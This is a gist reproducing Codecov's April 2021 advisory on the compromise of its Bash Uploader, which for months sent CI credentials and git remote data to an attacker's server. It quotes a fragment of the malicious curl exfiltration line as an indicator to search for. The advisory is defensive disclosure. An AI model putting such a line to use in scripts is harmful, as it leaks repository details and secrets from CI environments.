Skip to content

Instantly share code, notes, and snippets.

@afirth
Created April 15, 2021 13:20
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save afirth/c7c6cd7e51bf283a67cbdfe99668fde5 to your computer and use it in GitHub Desktop.
Codecov
Product
Solutions
Customers
Resources
Pricing
Contact
Login
APRIL 15TH, 2021
Bash Uploader Security Update
Note: If you are in the affected user group, at 6 am PT, Thursday, April 15th, we emailed your email address on file from GitHub / GitLab / Bitbucket and added a notification banner in the Codecov application after you log in.
About the Event
Codecov takes the security of its systems and data very seriously and we have implemented numerous safeguards to protect you. On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.
Immediately upon becoming aware of the issue, Codecov secured and remediated the affected script and began investigating any potential impact on users. A third-party forensic firm has been engaged to assist us in this analysis. We have reported this matter to law enforcement and are fully cooperating with their investigation.
Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users' continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure.
The Bash Uploader is also used in these related uploaders: Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step (together, the “Bash Uploaders”). Therefore, these related uploaders were also impacted by this event.
The altered version of the Bash Uploader script could potentially affect:
Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
The git remote information of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
Recommend Actions for Affected Users
Because of our commitment to trust and transparency, we have worked diligently to determine the potential impact to our customers and identify customers who may have used the Bash Uploaders during the relevant time periods. For affected users, we have emailed you on April 15th using you email address on file from Github / Gitlab / Bitbucket, and there is a notification banner after you log in to Codecov.
We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.
You can determine the keys and tokens that are surfaced to your CI environment by running the env command in your CI pipeline. If anything returned from that command is considered private or sensitive, we strongly recommend invalidating the credential and generating a new one. Additionally, we would recommend that you audit the use of these tokens in your system.
Additionally, if you use a locally stored version of a Bash Uploader, you should check that version for the following:
curl -sm 0.5 -d “$(git remote -v)
If this appears anywhere in your locally stored Bash Uploader, you should immediately replace the bash files with the most recent version from https://codecov.io/bash.
If you use a self-hosted (on-premises) version of Codecov, it is very unlikely you are impacted. To be impacted, your CI pipeline would need to be fetching the Bash Uploader from https://codecov.io/bash instead of from your self-hosted Codecov installation. You can verify from where you are fetching the Bash Uploader by looking at your CI pipeline configuration.
If you conducted a checksum comparison before using our Bash Uploaders as part of your CI processes, this issue may not impact you.
Actions Taken by Codecov
We have taken a number of steps to address this situation including:
rotating all relevant internal credentials, including the key used to facilitate the modification of the Bash Uploader;
auditing where and how the key was accessible;
setting up monitoring and auditing tools to ensure that this kind of unintended change cannot occur to the Bash Uploader again; and
working with the hosting provider of the third-party server to ensure the malicious webserver was properly decommissioned.
Codecov maintains a variety of information security policies, procedures, practices, and controls. We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event. We are also working to further enhance security so we can stay ahead of this type of activity, including reinforcing our security tools, policies, and procedures.
We will continue to share with you as much information as we are able and encourage you to reach out to us with any questions or concerns you have at security@codecov.io.
We value the trust you place in us and our solutions and pledge to continuously work to earn it. We regret any inconvenience this may cause and are committed to minimizing any potential impact on you, our users and customers.
Sincerely,
Jerrod Engelberg
CEO, Codecov
FAQs
What is the Codecov Bash Uploader? Expand
How did Codecov learn of this event? Expand
When did this event occur? Expand
Who was responsible for this event? Expand
What types of information was accessed during this event? Expand
Have you notified the appropriate authorities? Expand
Why did you not disclose this event sooner? Expand
I didn’t receive a communication from Codecov. Was I not affected? Expand
How do I know if I was impacted by this event? Expand
Do I need to take action if I was impacted? Expand
How do I know what environment variables of mine may have been available to the actor? Expand
I have multiple repositories using Codecov. How do I know which repositories were affected? Expand
How does Codecov plan to support us in regard to this event? Expand
Is it safe to use Codecov systems and services? Expand
I use Codecov’s self-hosted / on-prem offering, could I be impacted? Expand
How have you addressed the event and what steps have you taken to ensure it will not occur again? Expand
PRODUCT
Features
Documentation
API
Status
SOLUTIONS
Open Source
Enterprise
Startups
Education
CUSTOMERS
Customers
Community
Swag
RESOURCES
Webinars
Blog
Documentation
COMPANY
Press
Careers We're Hiring
CONTACT US
Contact
Demo
Support
Select Language​▼
Terms & Conditions Privacy Security EULA GDPR
© Codecov 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment